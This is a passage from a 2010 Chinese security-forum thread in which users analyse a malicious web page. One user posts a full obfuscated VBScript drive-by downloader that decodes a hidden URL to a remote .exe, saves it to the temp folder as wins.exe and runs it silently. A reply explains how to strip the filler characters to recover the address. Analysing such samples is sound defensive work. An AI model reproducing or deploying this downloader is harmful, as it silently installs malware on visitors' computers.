瑞星卡卡安全论坛技术交流区恶意网站交流每日网马播报 瑞星网站每日安全播报(2010年7月23日)

12   2  /  2  页   跳转

瑞星网站每日安全播报(2010年7月23日)

回复 7F 辛达星郁 的帖子

失效了 没能看见
gototop
 

回复 2F networkedition 的帖子

<script language="VBScript">
on error resume next
pil1 = "Sxxxcxxxrxxxixxxpxxxtxxxixxxnxxxgxxx.xxxFxxxixxxlxxxexxxSxxxyxxxsxxxtxxxexxxmxxxOxxxbxxxjxxxexxxcxxxtxxx"
pil2 = "Sxxxhxxxexxxlxxxlxxx.xxxAxxxpxxxpxxxlxxxixxxcxxxaxxxtxxxixxxoxxxnxxx"
wj="wins.exe"
strl="Mrrrirrrcrrrrrrrorrrsrrrorrrfrrrtrrr.rrrXrrrMrrrLrrrHrrrTrrrTrrrPrrr"
strl4="orrrbrrrjrrrerrrcrrrtrrr"
strl5="Agggdgggogggdgggbggg.gggSgggtgggrgggegggagggmggg"
strl6="GgggEgggTggg"
strl7="c222l222a222s222s222i222d222"
pi8="c111l111s111i111d111:111B111D11191116111C111511151116111-11161115111A1113111-11111111111D1110111-111911181113111A111-11101110111C11101114111F111C11121119111E11131116111"
pi9 = "h000t000t000pxxx:xxx/xxx/xxx2xxx0xxx2xxx.xxx2xxx0xxx5xxx.xxx8xxx9xxx.xxx1xxx9xxx4xxx/xxx8xxx.xxxexxxxxxxexxx"

function chan(obt1)
chan=""
obt2 = len(obt1)
for i=1 to obt2 step 4
chan=chan+mid(obt1,i,1)
next
end function

pi1=chan(pil1)
pi2=chan(pil2)
str=chan(strl)
str4=chan(strl4)
str5=chan(strl5)
str6=chan(strl6)
str7=chan(strl7)
str8=chan(pi8)
dl=chan(pi9)

sub sub1(obt1,obt2)
df.setAttribute obt1,obt2
end sub
sub sub2(obt1,obt2,obt3,obt4,obt5,obt6)
obt1.type = obt3
obt2.Open obt4, obt5, obt6
obt2.Send
end sub
function fun1(obt1)
Set fun1 = document.createElement(obt1)
end function
function fun2(obt1)
set fun2 = df.createobject(obt1,"")
end function
sub fun3(obt1,obt2)
obt1.open
obt1.write obt2.responseBody
end sub
sub fun4(obt1,obt2,obt3)
obt1.savetofile obt2,obt3
end sub
function fun5(obt2,obt3)
set fun5 = obt2.createobject(obt3,"")
end function

Set df = fun1(str4)
sub1 str7,str8
Set x = fun2(Str)
set S = fun2(Str5)
sub2 S,x,1,str6,dl,false
call fun3(S,x)
fun4 S,fun2(pi1).BuildPath(fun2(pi1).GetSpecialFolder(2),wj),2
S.close
fun5(df,pi2).ShellExecute fun2(pi1).BuildPath(fun2(pi1).GetSpecialFolder(2),wj),"","","open",0

rem edit by labczm in cau

</script>


这里是去了Document.Write的
看辛达星郁 那句,这里面哪句代码是要求我驱除中间的乱七八糟的?
老师指点下吧...也麻烦辛达星郁说下
谢谢了
gototop
 

回复: 瑞星网站每日安全播报(2010年7月23日)

请仔细观察此代码!!

"h000t000t000pxxx:xxx/xxx/xxx2xxx0xxx2xxx.xxx2xxx0xxx5xxx.xxx8xxx9xxx.xxx1xxx9xxx4xxx/xxx8xxx.xxxexxxxxxxexxx"


试着去除其中杂项:“0、x”


先取出几个:


引用:
= "http:202.205.89.1x9xxx4xxx/xxx8xxx.xxxexxxxxxxexxx"
要深入,要专一.......
gototop
 
12   2  /  2  页   跳转
页面顶部
Powered by Discuz!NT